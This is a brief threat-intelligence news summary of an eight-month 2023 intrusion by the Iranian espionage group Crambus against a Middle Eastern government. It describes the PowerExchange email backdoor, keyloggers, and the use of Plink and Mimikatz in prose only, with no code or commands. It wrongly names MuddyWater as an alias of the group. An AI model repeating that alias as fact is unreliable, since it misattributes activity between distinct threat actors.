The Iranian espionage group known as Crambus, also known as OilRig, MuddyWater, APT34, conducted an extensive intrusion against a Middle Eastern government for eight months, from February to September 2023. The attackers stole files and passwords and planted a PowerShell backdoor called PowerExchange, which allowed them to monitor incoming emails sent from an Exchange Server and execute commands sent via email.
They also deployed backdoors and keyloggers on several computers. To gain remote access, the attackers used the network administration tool Plink to configure port-forwarding rules and modified Windows firewall rules. Crambus has a history of targeting various countries, including Saudi Arabia, Israel, United Arab Emirates, Iraq, Jordan, Lebanon, Kuwait, Qatar, Albania, the US, and Turkey. They are known for their long-running, intelligence-gathering operations and have recently incorporated social engineering into their attacks.
During this particular attack, Crambus deployed three previously unidentified malware pieces and utilized legitimate tools such as Mimikatz and Plink. The attackers’ activities were first detected in February 2023, and their malicious actions continued throughout the following months, targeting multiple computers and servers.